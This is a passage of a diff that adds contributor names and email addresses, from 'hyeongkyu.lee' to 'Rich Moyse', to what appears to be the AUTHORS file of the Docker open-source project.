+hyeongkyu.lee <hyeongkyu.lee@navercorp.com>
+hyp3rdino <markus.kortlang@lhsystems.com>
+Hyzhou <1187766782@qq.com>
+Ian Babrou <ibobrik@gmail.com>
+Ian Bishop <ianbishop@pace7.com>
+Ian Bull <irbull@gmail.com>
+Ian Calvert <ianjcalvert@gmail.com>
+Ian Lee <IanLee1521@gmail.com>
+Ian Main <imain@redhat.com>
+Ian Truslove <ian.truslove@gmail.com>
+Iavael <iavaelooeyt@gmail.com>
+Icaro Seara <icaro.seara@gmail.com>
+Igor Dolzhikov <bluesriverz@gmail.com>
+Ilkka Laukkanen <ilkka@ilkka.io>
+Ilya Dmitrichenko <errordeveloper@gmail.com>
+Ilya Gusev <mail@igusev.ru>
+ILYA Khlopotov <ilya.khlopotov@gmail.com>
+imre Fitos <imre.fitos+github@gmail.com>
+inglesp <peter.inglesby@gmail.com>
+Ingo Gottwald <in.gottwald@gmail.com>
+Isaac Dupree <antispam@idupree.com>
+Isabel Jimenez <contact.isabeljimenez@gmail.com>
+Isao Jonas <isao.jonas@gmail.com>
+Ivan Babrou <ibobrik@gmail.com>
+Ivan Fraixedes <ifcdev@gmail.com>
+Ivan Grcic <igrcic@gmail.com>
+J Bruni <joaohbruni@yahoo.com.br>
+J. Nunn <jbnunn@gmail.com>
+Jack Danger Canty <jackdanger@squareup.com>
+Jacob Atzen <jacob@jacobatzen.dk>
+Jacob Edelman <edelman.jd@gmail.com>
+Jake Champlin <jake.champlin.27@gmail.com>
+Jake Moshenko <jake@devtable.com>
+jakedt <jake@devtable.com>
+James Allen <jamesallen0108@gmail.com>
+James Carey <jecarey@us.ibm.com>
+James Carr <james.r.carr@gmail.com>
+James DeFelice <james.defelice@ishisystems.com>
+James Harrison Fisher <jameshfisher@gmail.com>
+James Kyburz <james.kyburz@gmail.com>
+James Kyle <james@jameskyle.org>
+James Lal <james@lightsofapollo.com>
+James Mills <prologic@shortcircuit.net.au>
+James Nugent <james@jen20.com>
+James Turnbull <james@lovedthanlost.net>
+Jamie Hannaford <jamie.hannaford@rackspace.com>
+Jamshid Afshar <jafshar@yahoo.com>
+Jan Keromnes <janx@linux.com>
+Jan Koprowski <jan.koprowski@gmail.com>
+Jan Pazdziora <jpazdziora@redhat.com>
+Jan Toebes <jan@toebes.info>
+Jan-Gerd Tenberge <janten@gmail.com>
+Jan-Jaap Driessen <janjaapdriessen@gmail.com>
+Jana Radhakrishnan <mrjana@docker.com>
+Jannick Fahlbusch <git@jf-projects.de>
+Januar Wayong <januar@gmail.com>
+Jared Biel <jared.biel@bolderthinking.com>
+Jared Hocutt <jaredh@netapp.com>
+Jaroslaw Zabiello <hipertracker@gmail.com>
+jaseg <jaseg@jaseg.net>
+Jasmine Hegman <jasmine@jhegman.com>
+Jason Divock <jdivock@gmail.com>
+Jason Giedymin <jasong@apache.org>
+Jason Green <Jason.Green@AverInformatics.Com>
+Jason Hall <imjasonh@gmail.com>
+Jason Heiss <jheiss@aput.net>
+Jason Livesay <ithkuil@gmail.com>
+Jason McVetta <jason.mcvetta@gmail.com>
+Jason Plum <jplum@devonit.com>
+Jason Shepherd <jason@jasonshepherd.net>
+Jason Smith <jasonrichardsmith@gmail.com>
+Jason Sommer <jsdirv@gmail.com>
+Jason Stangroome <jason@codeassassin.com>
+jaxgeller <jacksongeller@gmail.com>
+Jay <imjching@hotmail.com>
+Jay <teguhwpurwanto@gmail.com>
+Jay Kamat <github@jgkamat.33mail.com>
+Jean-Baptiste Barth <jeanbaptiste.barth@gmail.com>
+Jean-Baptiste Dalido <jeanbaptiste@appgratis.com>
+Jean-Paul Calderone <exarkun@twistedmatrix.com>
+Jean-Tiare Le Bigot <jt@yadutaf.fr>
+Jeff Anderson <jeff@docker.com>
+Jeff Johnston <jeff.johnston.mn@gmail.com>
+Jeff Lindsay <progrium@gmail.com>
+Jeff Mickey <j@codemac.net>
+Jeff Minard <jeff@creditkarma.com>
+Jeff Nickoloff <jeff.nickoloff@gmail.com>
+Jeff Silberman <jsilberm@gmail.com>
+Jeff Welch <whatthejeff@gmail.com>
+Jeffrey Bolle <jeffreybolle@gmail.com>
+Jeffrey Morgan <jmorganca@gmail.com>
+Jeffrey van Gogh <jvg@google.com>
+Jenny Gebske <jennifer@gebske.de>
+Jeremy Grosser <jeremy@synack.me>
+Jeremy Price <jprice.rhit@gmail.com>
+Jeremy Qian <vanpire110@163.com>
+Jeremy Unruh <jeremybunruh@gmail.com>
+Jeroen Jacobs <github@jeroenj.be>
+Jesse Dearing <jesse.dearing@gmail.com>
+Jesse Dubay <jesse@thefortytwo.net>
+Jessica Frazelle <jessfraz@google.com>
+Jezeniel Zapanta <jpzapanta22@gmail.com>
+jgeiger <jgeiger@gmail.com>
+Jhon Honce <jhonce@redhat.com>
+Ji.Zhilong <zhilongji@gmail.com>
+Jian Zhang <zhangjian.fnst@cn.fujitsu.com>
+jianbosun <wonderflow.sun@gmail.com>
+Jilles Oldenbeuving <ojilles@gmail.com>
+Jim Alateras <jima@comware.com.au>
+Jim Perrin <jperrin@centos.org>
+Jimmy Cuadra <jimmy@jimmycuadra.com>
+Jimmy Puckett <jimmy.puckett@spinen.com>
+jimmyxian <jimmyxian2004@yahoo.com.cn>
+Jinsoo Park <cellpjs@gmail.com>
+Jiri Popelka <jpopelka@redhat.com>
+Jiří Župka <jzupka@redhat.com>
+jjy <jiangjinyang@outlook.com>
+jmzwcn <jmzwcn@gmail.com>
+Joao Fernandes <joao.fernandes@docker.com>
+Joe Beda <joe.github@bedafamily.com>
+Joe Doliner <jdoliner@pachyderm.io>
+Joe Ferguson <joe@infosiftr.com>
+Joe Gordon <joe.gordon0@gmail.com>
+Joe Shaw <joe@joeshaw.org>
+Joe Van Dyk <joe@tanga.com>
+Joel Friedly <joelfriedly@gmail.com>
+Joel Handwell <joelhandwell@gmail.com>
+Joel Hansson <joel.hansson@ecraft.com>
+Joel Wurtz <jwurtz@jolicode.com>
+Joey Geiger <jgeiger@users.noreply.github.com>
+Joey Gibson <joey@joeygibson.com>
+Joffrey F <joffrey@docker.com>
+Johan Euphrosine <proppy@google.com>
+Johan Rydberg <johan.rydberg@gmail.com>
+Johanan Lieberman <johanan.lieberman@gmail.com>
+Johannes 'fish' Ziemke <github@freigeist.org>
+John Costa <john.costa@gmail.com>
+John Feminella <jxf@jxf.me>
+John Gardiner Myers <jgmyers@proofpoint.com>
+John Gossman <johngos@microsoft.com>
+John Howard (VM) <John.Howard@microsoft.com>
+John OBrien III <jobrieniii@yahoo.com>
+John Starks <jostarks@microsoft.com>
+John Tims <john.k.tims@gmail.com>
+John Warwick <jwarwick@gmail.com>
+John Willis <john.willis@docker.com>
+johnharris85 <john@johnharris.io>
+Jon Wedaman <jweede@gmail.com>
+Jonas Pfenniger <jonas@pfenniger.name>
+Jonathan A. Sternberg <jonathansternberg@gmail.com>
+Jonathan Boulle <jonathanboulle@gmail.com>
+Jonathan Camp <jonathan@irondojo.com>
+Jonathan Dowland <jon+github@alcopop.org>
+Jonathan Lebon <jlebon@redhat.com>
+Jonathan Lomas <jonathan@floatinglomas.ca>
+Jonathan McCrohan <jmccrohan@gmail.com>
+Jonathan Mueller <j.mueller@apoveda.ch>
+Jonathan Pares <jonathanpa@users.noreply.github.com>
+Jonathan Rudenberg <jonathan@titanous.com>
+Jonathan Stoppani <jonathan.stoppani@divio.com>
+Joost Cassee <joost@cassee.net>
+Jordan <jjn2009@users.noreply.github.com>
+Jordan Arentsen <blissdev@gmail.com>
+Jordan Sissel <jls@semicomplete.com>
+Jose Diaz-Gonzalez <josegonzalez@users.noreply.github.com>
+Joseph Anthony Pasquale Holsten <joseph@josephholsten.com>
+Joseph Hager <ajhager@gmail.com>
+Joseph Kern <jkern@semafour.net>
+Josh <jokajak@gmail.com>
+Josh Bodah <jb3689@yahoo.com>
+Josh Chorlton <jchorlton@gmail.com>
+Josh Hawn <josh.hawn@docker.com>
+Josh Horwitz <horwitz@addthis.com>
+Josh Poimboeuf <jpoimboe@redhat.com>
+Josiah Kiehl <jkiehl@riotgames.com>
+José Tomás Albornoz <jojo@eljojo.net>
+JP <jpellerin@leapfrogonline.com>
+jrabbit <jackjrabbit@gmail.com>
+Julian Taylor <jtaylor.debian@googlemail.com>
+Julien Barbier <write0@gmail.com>
+Julien Bisconti <veggiemonk@users.noreply.github.com>
+Julien Bordellier <julienbordellier@gmail.com>
+Julien Dubois <julien.dubois@gmail.com>
+Julien Pervillé <julien.perville@perfect-memory.com>
+Julio Montes <imc.coder@gmail.com>
+Jun-Ru Chang <jrjang@gmail.com>
+Jussi Nummelin <jussi.nummelin@gmail.com>
+Justas Brazauskas <brazauskasjustas@gmail.com>
+Justin Cormack <justin.cormack@docker.com>
+Justin Force <justin.force@gmail.com>
+Justin Plock <jplock@users.noreply.github.com>
+Justin Simonelis <justin.p.simonelis@gmail.com>
+Justin Terry <juterry@microsoft.com>
+Justyn Temme <justyntemme@gmail.com>
+Jyrki Puttonen <jyrkiput@gmail.com>
+Jérôme Petazzoni <jerome.petazzoni@dotcloud.com>
+Jörg Thalheim <joerg@higgsboson.tk>
+Kai Blin <kai@samba.org>
+Kai Qiang Wu(Kennan) <wkq5325@gmail.com>
+Kamil Domański <kamil@domanski.co>
+kamjar gerami <kami.gerami@gmail.com>
+Kanstantsin Shautsou <kanstantsin.sha@gmail.com>
+Kara Alexandra <kalexandra@us.ibm.com>
+Karan Lyons <karan@karanlyons.com>
+Kareem Khazem <karkhaz@karkhaz.com>
+kargakis <kargakis@users.noreply.github.com>
+Karl Grzeszczak <karlgrz@gmail.com>
+Karol Duleba <mr.fuxi@gmail.com>
+Katie McLaughlin <katie@glasnt.com>
+Kato Kazuyoshi <kato.kazuyoshi@gmail.com>
+Katrina Owen <katrina.owen@gmail.com>
+Kawsar Saiyeed <kawsar.saiyeed@projiris.com>
+kayrus <kay.diam@gmail.com>
+Ke Xu <leonhartx.k@gmail.com>
+Keith Hudgins <greenman@greenman.org>
+Keli Hu <dev@keli.hu>
+Ken Cochrane <kencochrane@gmail.com>
+Ken Herner <kherner@progress.com>
+Ken ICHIKAWA <ichikawa.ken@jp.fujitsu.com>
+Kenfe-Mickaël Laventure <mickael.laventure@gmail.com>
+Kenjiro Nakayama <nakayamakenjiro@gmail.com>
+Kent Johnson <kentoj@gmail.com>
+Kevin "qwazerty" Houdebert <kevin.houdebert@gmail.com>
+Kevin Burke <kev@inburke.com>
+Kevin Clark <kevin.clark@gmail.com>
+Kevin J. Lynagh <kevin@keminglabs.com>
+Kevin Jing Qiu <kevin@idempotent.ca>
+Kevin Menard <kevin@nirvdrum.com>
+Kevin P. Kucharczyk <kevinkucharczyk@gmail.com>
+Kevin Richardson <kevin@kevinrichardson.co>
+Kevin Shi <kshi@andrew.cmu.edu>
+Kevin Wallace <kevin@pentabarf.net>
+Kevin Yap <me@kevinyap.ca>
+kevinmeredith <kevin.m.meredith@gmail.com>
+Keyvan Fatehi <keyvanfatehi@gmail.com>
+kies <lleelm@gmail.com>
+Kim BKC Carlbacker <kim.carlbacker@gmail.com>
+Kim Eik <kim@heldig.org>
+Kimbro Staken <kstaken@kstaken.com>
+Kir Kolyshkin <kir@openvz.org>
+Kiran Gangadharan <kiran.daredevil@gmail.com>
+Kirill Kolyshkin <kolyshkin@users.noreply.github.com>
+Kirill SIbirev <l0kix2@gmail.com>
+knappe <tyler.knappe@gmail.com>
+Kohei Tsuruta <coheyxyz@gmail.com>
+Koichi Shiraishi <k@zchee.io>
+Konrad Kleine <konrad.wilhelm.kleine@gmail.com>
+Konstantin L <sw.double@gmail.com>
+Konstantin Pelykh <kpelykh@zettaset.com>
+Krasimir Georgiev <support@vip-consult.co.uk>
+Kris-Mikael Krister <krismikael@protonmail.com>
+Kristian Haugene <kristian.haugene@capgemini.com>
+Kristina Zabunova <triara.xiii@gmail.com>
+krrg <krrgithub@gmail.com>
+Kun Zhang <zkazure@gmail.com>
+Kunal Kushwaha <kunal.kushwaha@gmail.com>
+Kyle Conroy <kyle.j.conroy@gmail.com>
+Kyle Linden <linden.kyle@gmail.com>
+kyu <leehk1227@gmail.com>
+Lachlan Coote <lcoote@vmware.com>
+Lai Jiangshan <jiangshanlai@gmail.com>
+Lajos Papp <lajos.papp@sequenceiq.com>
+Lakshan Perera <lakshan@laktek.com>
+Lalatendu Mohanty <lmohanty@redhat.com>
+lalyos <lalyos@yahoo.com>
+Lance Chen <cyen0312@gmail.com>
+Lance Kinley <lkinley@loyaltymethods.com>
+Lars Butler <Lars.Butler@gmail.com>
+Lars Kellogg-Stedman <lars@redhat.com>
+Lars R. Damerow <lars@pixar.com>
+Laszlo Meszaros <lacienator@gmail.com>
+Laurent Erignoux <lerignoux@gmail.com>
+Laurie Voss <github@seldo.com>
+Leandro Siqueira <leandro.siqueira@gmail.com>
+Lee Chao <932819864@qq.com>
+Lee, Meng-Han <sunrisedm4@gmail.com>
+leeplay <hyeongkyu.lee@navercorp.com>
+Lei Jitang <leijitang@huawei.com>
+Len Weincier <len@cloudafrica.net>
+Lennie <github@consolejunkie.net>
+Leszek Kowalski <github@leszekkowalski.pl>
+Levi Blackstone <levi.blackstone@rackspace.com>
+Levi Gross <levi@levigross.com>
+Lewis Marshall <lewis@lmars.net>
+Lewis Peckover <lew+github@lew.io>
+Liam Macgillavry <liam@kumina.nl>
+Liana Lo <liana.lixia@gmail.com>
+Liang Mingqiang <mqliang.zju@gmail.com>
+Liang-Chi Hsieh <viirya@gmail.com>
+liaoqingwei <liaoqingwei@huawei.com>
+limsy <seongyeol37@gmail.com>
+Lin Lu <doraalin@163.com>
+LingFaKe <lingfake@huawei.com>
+Linus Heckemann <lheckemann@twig-world.com>
+Liran Tal <liran.tal@gmail.com>
+Liron Levin <liron@twistlock.com>
+Liu Bo <bo.li.liu@oracle.com>
+Liu Hua <sdu.liu@huawei.com>
+lixiaobing10051267 <li.xiaobing1@zte.com.cn>
+LIZAO LI <lzlarryli@gmail.com>
+Lloyd Dewolf <foolswisdom@gmail.com>
+Lokesh Mandvekar <lsm5@fedoraproject.org>
+longliqiang88 <394564827@qq.com>
+Lorenz Leutgeb <lorenz.leutgeb@gmail.com>
+Lorenzo Fontana <fontanalorenzo@me.com>
+Louis Opter <kalessin@kalessin.fr>
+Luca Marturana <lucamarturana@gmail.com>
+Luca Orlandi <luca.orlandi@gmail.com>
+Luca-Bogdan Grigorescu <Luca-Bogdan Grigorescu>
+Lucas Chan <lucas-github@lucaschan.com>
+Lucas Chi <lucas@teacherspayteachers.com>
+Luciano Mores <leslau@gmail.com>
+Luis Martínez de Bartolomé Izquierdo <lmartinez@biicode.com>
+Lukas Waslowski <cr7pt0gr4ph7@gmail.com>
+lukaspustina <lukas.pustina@centerdevice.com>
+Lukasz Zajaczkowski <Lukasz.Zajaczkowski@ts.fujitsu.com>
+lukemarsden <luke@digital-crocus.com>
+Lynda O'Leary <lyndaoleary29@gmail.com>
+Lénaïc Huard <lhuard@amadeus.com>
+Ma Shimiao <mashimiao.fnst@cn.fujitsu.com>
+Mabin <bin.ma@huawei.com>
+Madhav Puri <madhav.puri@gmail.com>
+Madhu Venugopal <madhu@socketplane.io>
+Mageee <21521230.zju.edu.cn>
+Mahesh Tiyyagura <tmahesh@gmail.com>
+malnick <malnick@gmail..com>
+Malte Janduda <mail@janduda.net>
+manchoz <giampaolo@trampolineup.com>
+Manfred Touron <m@42.am>
+Manfred Zabarauskas <manfredas@zabarauskas.com>
+Mansi Nahar <mmn4185@rit.edu>
+mansinahar <mansinahar@users.noreply.github.com>
+Manuel Meurer <manuel@krautcomputing.com>
+Manuel Woelker <github@manuel.woelker.org>
+mapk0y <mapk0y@gmail.com>
+Marc Abramowitz <marc@marc-abramowitz.com>
+Marc Kuo <kuomarc2@gmail.com>
+Marc Tamsky <mtamsky@gmail.com>
+Marcelo Salazar <chelosalazar@gmail.com>
+Marco Hennings <marco.hennings@freiheit.com>
+Marcus Farkas <toothlessgear@finitebox.com>
+Marcus Linke <marcus.linke@gmx.de>
+Marcus Ramberg <marcus@nordaaker.com>
+Marek Goldmann <marek.goldmann@gmail.com>
+Marian Marinov <mm@yuhu.biz>
+Marianna Tessel <mtesselh@gmail.com>
+Mario Loriedo <mario.loriedo@gmail.com>
+Marius Gundersen <me@mariusgundersen.net>
+Marius Sturm <marius@graylog.com>
+Marius Voila <marius.voila@gmail.com>
+Mark Allen <mrallen1@yahoo.com>
+Mark McGranaghan <mmcgrana@gmail.com>
+Mark McKinstry <mmckinst@umich.edu>
+Mark West <markewest@gmail.com>
+Marko Mikulicic <mmikulicic@gmail.com>
+Marko Tibold <marko@tibold.nl>
+Markus Fix <lispmeister@gmail.com>
+Martijn Dwars <ikben@martijndwars.nl>
+Martijn van Oosterhout <kleptog@svana.org>
+Martin Honermeyer <maze@strahlungsfrei.de>
+Martin Kelly <martin@surround.io>
+Martin Mosegaard Amdisen <martin.amdisen@praqma.com>
+Martin Redmond <redmond.martin@gmail.com>
+Mary Anthony <mary.anthony@docker.com>
+Masahito Zembutsu <zembutsu@users.noreply.github.com>
+Mason Malone <mason.malone@gmail.com>
+Mateusz Sulima <sulima.mateusz@gmail.com>
+Mathias Monnerville <mathias@monnerville.com>
+Mathieu Le Marec - Pasquet <kiorky@cryptelium.net>
+Matt Apperson <me@mattapperson.com>
+Matt Bachmann <bachmann.matt@gmail.com>
+Matt Bentley <matt.bentley@docker.com>
+Matt Haggard <haggardii@gmail.com>
+Matt Hoyle <matt@deployable.co>
+Matt McCormick <matt.mccormick@kitware.com>
+Matt Moore <mattmoor@google.com>
+Matt Richardson <matt@redgumtech.com.au>
+Matt Robenolt <matt@ydekproductions.com>
+Matthew Heon <mheon@redhat.com>
+Matthew Mayer <matthewkmayer@gmail.com>
+Matthew Mueller <mattmuelle@gmail.com>
+Matthew Riley <mattdr@google.com>
+Matthias Klumpp <matthias@tenstral.net>
+Matthias Kühnle <git.nivoc@neverbox.com>
+Matthias Rampke <mr@soundcloud.com>
+Matthieu Hauglustaine <matt.hauglustaine@gmail.com>
+mattymo <raytrac3r@gmail.com>
+mattyw <mattyw@me.com>
+Mauricio Garavaglia <mauricio@medallia.com>
+mauriyouth <mauriyouth@gmail.com>
+Max Shytikov <mshytikov@gmail.com>
+Maxim Fedchyshyn <sevmax@gmail.com>
+Maxim Ivanov <ivanov.maxim@gmail.com>
+Maxim Kulkin <mkulkin@mirantis.com>
+Maxim Treskin <zerthurd@gmail.com>
+Maxime Petazzoni <max@signalfuse.com>
+Meaglith Ma <genedna@gmail.com>
+meejah <meejah@meejah.ca>
+Megan Kostick <mkostick@us.ibm.com>
+Mehul Kar <mehul.kar@gmail.com>
+Mei ChunTao <mei.chuntao@zte.com.cn>
+Mengdi Gao <usrgdd@gmail.com>
+Mert Yazıcıoğlu <merty@users.noreply.github.com>
+mgniu <mgniu@dataman-inc.com>
+Micah Zoltu <micah@newrelic.com>
+Michael A. Smith <michael@smith-li.com>
+Michael Bridgen <mikeb@squaremobius.net>
+Michael Brown <michael@netdirect.ca>
+Michael Chiang <mchiang@docker.com>
+Michael Crosby <michael@docker.com>
+Michael Currie <mcurrie@bruceforceresearch.com>
+Michael Friis <friism@gmail.com>
+Michael Gorsuch <gorsuch@github.com>
+Michael Grauer <michael.grauer@kitware.com>
+Michael Holzheu <holzheu@linux.vnet.ibm.com>
+Michael Hudson-Doyle <michael.hudson@linaro.org>
+Michael Huettermann <michael@huettermann.net>
+Michael Käufl <docker@c.michael-kaeufl.de>
+Michael Neale <michael.neale@gmail.com>
+Michael Prokop <github@michael-prokop.at>
+Michael Scharf <github@scharf.gr>
+Michael Stapelberg <michael+gh@stapelberg.de>
+Michael Steinert <mike.steinert@gmail.com>
+Michael Thies <michaelthies78@gmail.com>
+Michael West <mwest@mdsol.com>
+Michal Fojtik <mfojtik@redhat.com>
+Michal Gebauer <mishak@mishak.net>
+Michal Jemala <michal.jemala@gmail.com>
+Michal Minar <miminar@redhat.com>
+Michal Wieczorek <wieczorek-michal@wp.pl>
+Michaël Pailloncy <mpapo.dev@gmail.com>
+Michał Czeraszkiewicz <czerasz@gmail.com>
+Michiel@unhosted <michiel@unhosted.org>
+Mickaël FORTUNATO <morsi.morsicus@gmail.com>
+Miguel Angel Fernández <elmendalerenda@gmail.com>
+Miguel Morales <mimoralea@gmail.com>
+Mihai Borobocea <MihaiBorob@gmail.com>
+Mihuleacc Sergiu <mihuleac.sergiu@gmail.com>
+Mike Brown <brownwm@us.ibm.com>
+Mike Chelen <michael.chelen@gmail.com>
+Mike Danese <mikedanese@google.com>
+Mike Dillon <mike@embody.org>
+Mike Dougherty <mike.dougherty@docker.com>
+Mike Gaffney <mike@uberu.com>
+Mike Goelzer <mike.goelzer@docker.com>
+Mike Leone <mleone896@gmail.com>
+Mike MacCana <mike.maccana@gmail.com>
+Mike Naberezny <mike@naberezny.com>
+Mike Snitzer <snitzer@redhat.com>
+mikelinjie <294893458@qq.com>
+Mikhail Sobolev <mss@mawhrin.net>
+Miloslav Trmač <mitr@redhat.com>
+mingqing <limingqing@cyou-inc.com>
+Mingzhen Feng <fmzhen@zju.edu.cn>
+Misty Stanley-Jones <misty@docker.com>
+Mitch Capper <mitch.capper@gmail.com>
+mlarcher <github@ringabell.org>
+Mohammad Banikazemi <mb@us.ibm.com>
+Mohammed Aaqib Ansari <maaquib@gmail.com>
+Mohit Soni <mosoni@ebay.com>
+Morgan Bauer <mbauer@us.ibm.com>
+Morgante Pell <morgante.pell@morgante.net>
+Morgy93 <thomas@ulfertsprygoda.de>
+Morten Siebuhr <sbhr@sbhr.dk>
+Morton Fox <github@qslw.com>
+Moysés Borges <moysesb@gmail.com>
+mqliang <mqliang.zju@gmail.com>
+Mrunal Patel <mrunalp@gmail.com>
+msabansal <sabansal@microsoft.com>
+mschurenko <matt.schurenko@gmail.com>
+muge <stevezhang2014@gmail.com>
+Mustafa Akın <mustafa91@gmail.com>
+Muthukumar R <muthur@gmail.com>
+Máximo Cuadros <mcuadros@gmail.com>
+Médi-Rémi Hashim <medimatrix@users.noreply.github.com>
+Nahum Shalman <nshalman@omniti.com>
+Nakul Pathak <nakulpathak3@hotmail.com>
+Nalin Dahyabhai <nalin@redhat.com>
+Nan Monnand Deng <monnand@gmail.com>
+Naoki Orii <norii@cs.cmu.edu>
+Natalie Parker <nparker@omnifone.com>
+Natanael Copa <natanael.copa@docker.com>
+Nate Brennand <nate.brennand@clever.com>
+Nate Eagleson <nate@nateeag.com>
+Nate Jones <nate@endot.org>
+Nathan Hsieh <hsieh.nathan@gmail.com>
+Nathan Kleyn <nathan@nathankleyn.com>
+Nathan LeClaire <nathan.leclaire@docker.com>
+Nathan McCauley <nathan.mccauley@docker.com>
+Nathan Williams <nathan@teamtreehouse.com>
+Neal McBurnett <neal@mcburnett.org>
+Neil Peterson <neilpeterson@outlook.com>
+Nelson Chen <crazysim@gmail.com>
+Neyazul Haque <nuhaque@gmail.com>
+Nghia Tran <nghia@google.com>
+Niall O'Higgins <niallo@unworkable.org>
+Nicholas E. Rabenau <nerab@gmx.at>
+nick <nicholasjamesrusso@gmail.com>
+Nick DeCoursin <n.decoursin@foodpanda.com>
+Nick Irvine <nfirvine@nfirvine.com>
+Nick Parker <nikaios@gmail.com>
+Nick Payne <nick@kurai.co.uk>
+Nick Stenning <nick.stenning@digital.cabinet-office.gov.uk>
+Nick Stinemates <nick@stinemates.org>
+Nicola Kabar <nicolaka@gmail.com>
+Nicolas Borboën <ponsfrilus@users.noreply.github.com>
+Nicolas De loof <nicolas.deloof@gmail.com>
+Nicolas Dudebout <nicolas.dudebout@gatech.edu>
+Nicolas Goy <kuon@goyman.com>
+Nicolas Kaiser <nikai@nikai.net>
+Nicolás Hock Isaza <nhocki@gmail.com>
+Nigel Poulton <nigelpoulton@hotmail.com>
+NikolaMandic <mn080202@gmail.com>
+nikolas <nnyby@columbia.edu>
+Nirmal Mehta <nirmalkmehta@gmail.com>
+Nishant Totla <nishanttotla@gmail.com>
+NIWA Hideyuki <niwa.niwa@nifty.ne.jp>
+noducks <onemannoducks@gmail.com>
+Nolan Darilek <nolan@thewordnerd.info>
+nponeccop <andy.melnikov@gmail.com>
+Nuutti Kotivuori <naked@iki.fi>
+nzwsch <hi@nzwsch.com>
+O.S. Tezer <ostezer@gmail.com>
+objectified <objectified@gmail.com>
+OddBloke <daniel@daniel-watkins.co.uk>
+odk- <github@odkurzacz.org>
+Oguz Bilgic <fisyonet@gmail.com>
+Oh Jinkyun <tintypemolly@gmail.com>
+Ohad Schneider <ohadschn@users.noreply.github.com>
+ohmystack <jun.jiang02@ele.me>
+Ole Reifschneider <mail@ole-reifschneider.de>
+Oliver Neal <ItsVeryWindy@users.noreply.github.com>
+Olivier Gambier <dmp42@users.noreply.github.com>
+Olle Jonsson <olle.jonsson@gmail.com>
+Oriol Francès <oriolfa@gmail.com>
+orkaa <orkica@gmail.com>
+Oskar Niburski <oskarniburski@gmail.com>
+Otto Kekäläinen <otto@seravo.fi>
+oyld <oyld0210@163.com>
+ozlerhakan <hakan.ozler@kodcu.com>
+paetling <paetling@gmail.com>
+pandrew <letters@paulnotcom.se>
+panticz <mail@konczalski.de>
+Paolo G. Giarrusso <p.giarrusso@gmail.com>
+Pascal Borreli <pascal@borreli.com>
+Pascal Hartig <phartig@rdrei.net>
+Patrick Böänziger <patrick.baenziger@bsi-software.com>
+Patrick Devine <patrick.devine@docker.com>
+Patrick Hemmer <patrick.hemmer@gmail.com>
+Patrick Stapleton <github@gdi2290.com>
+pattichen <craftsbear@gmail.com>
+Paul <paul9869@gmail.com>
+paul <paul@inkling.com>
+Paul Annesley <paul@annesley.cc>
+Paul Bellamy <paul.a.bellamy@gmail.com>
+Paul Bowsher <pbowsher@globalpersonals.co.uk>
+Paul Furtado <pfurtado@hubspot.com>
+Paul Hammond <paul@paulhammond.org>
+Paul Jimenez <pj@place.org>
+Paul Lietar <paul@lietar.net>
+Paul Liljenberg <liljenberg.paul@gmail.com>
+Paul Morie <pmorie@gmail.com>
+Paul Nasrat <pnasrat@gmail.com>
+Paul Weaver <pauweave@cisco.com>
+Paulo Ribeiro <paigr.io@gmail.com>
+Pavel Lobashov <ShockwaveNN@gmail.com>
+Pavel Pospisil <pospispa@gmail.com>
+Pavel Sutyrin <pavel.sutyrin@gmail.com>
+Pavel Tikhomirov <ptikhomirov@parallels.com>
+Pavlos Ratis <dastergon@gentoo.org>
+Pavol Vargovcik <pallly.vargovcik@gmail.com>
+Peeyush Gupta <gpeeyush@linux.vnet.ibm.com>
+Peggy Li <peggyli.224@gmail.com>
+Pei Su <sillyousu@gmail.com>
+Penghan Wang <ph.wang@daocloud.io>
+perhapszzy@sina.com <perhapszzy@sina.com>
+pestophagous <pestophagous@users.noreply.github.com>
+Peter Bourgon <peter@bourgon.org>
+Peter Braden <peterbraden@peterbraden.co.uk>
+Peter Choi <reikani@Peters-MacBook-Pro.local>
+Peter Dave Hello <PeterDaveHello@users.noreply.github.com>
+Peter Edge <peter.edge@gmail.com>
+Peter Ericson <pdericson@gmail.com>
+Peter Esbensen <pkesbensen@gmail.com>
+Peter Malmgren <ptmalmgren@gmail.com>
+Peter Salvatore <peter@psftw.com>
+Peter Volpe <petervo@redhat.com>
+Peter Waller <p@pwaller.net>
+Petr Švihlík <svihlik.petr@gmail.com>
+Phil <underscorephil@gmail.com>
+Phil Estes <estesp@linux.vnet.ibm.com>
+Phil Spitler <pspitler@gmail.com>
+Philip Monroe <phil@philmonroe.com>
+Philipp Wahala <philipp.wahala@gmail.com>
+Philipp Weissensteiner <mail@philippweissensteiner.com>
+Phillip Alexander <git@phillipalexander.io>
+pidster <pid@pidster.com>
+Piergiuliano Bossi <pgbossi@gmail.com>
+Pierre <py@poujade.org>
+Pierre Carrier <pierre@meteor.com>
+Pierre Dal-Pra <dalpra.pierre@gmail.com>
+Pierre Wacrenier <pierre.wacrenier@gmail.com>
+Pierre-Alain RIVIERE <pariviere@ippon.fr>
+Piotr Bogdan <ppbogdan@gmail.com>
+pixelistik <pixelistik@users.noreply.github.com>
+Porjo <porjo38@yahoo.com.au>
+Poul Kjeldager Sørensen <pks@s-innovations.net>
+Pradeep Chhetri <pradeep@indix.com>
+Prasanna Gautam <prasannagautam@gmail.com>
+Prayag Verma <prayag.verma@gmail.com>
+Przemek Hejman <przemyslaw.hejman@gmail.com>
+pysqz <randomq@126.com>
+qg <1373319223@qq.com>
+qhuang <h.huangqiang@huawei.com>
+Qiang Huang <h.huangqiang@huawei.com>
+qq690388648 <690388648@qq.com>
+Quentin Brossard <qbrossard@gmail.com>
+Quentin Perez <qperez@ocs.online.net>
+Quentin Tayssier <qtayssier@gmail.com>
+r0n22 <cameron.regan@gmail.com>
+Rafal Jeczalik <rjeczalik@gmail.com>
+Rafe Colton <rafael.colton@gmail.com>
+Raghavendra K T <raghavendra.kt@linux.vnet.ibm.com>
+Raghuram Devarakonda <draghuram@gmail.com>
+Rajat Pandit <rp@rajatpandit.com>
+Rajdeep Dua <dua_rajdeep@yahoo.com>
+Ralf Sippl <ralf.sippl@gmail.com>
+Ralle <spam@rasmusa.net>
+Ralph Bean <rbean@redhat.com>
+Ramkumar Ramachandra <artagnon@gmail.com>
+Ramon Brooker <rbrooker@aetherealmind.com>
+Ramon van Alteren <ramon@vanalteren.nl>
+Ray Tsang <saturnism@users.noreply.github.com>
+ReadmeCritic <frankensteinbot@gmail.com>
+Recursive Madman <recursive.madman@gmx.de>
+Regan McCooey <rmccooey27@aol.com>
+Remi Rampin <remirampin@gmail.com>
+Renato Riccieri Santos Zannon <renato.riccieri@gmail.com>
+resouer <resouer@163.com>
+rgstephens <greg@udon.org>
+Rhys Hiltner <rhys@twitch.tv>
+Rich Moyse <rich@moyse.us>
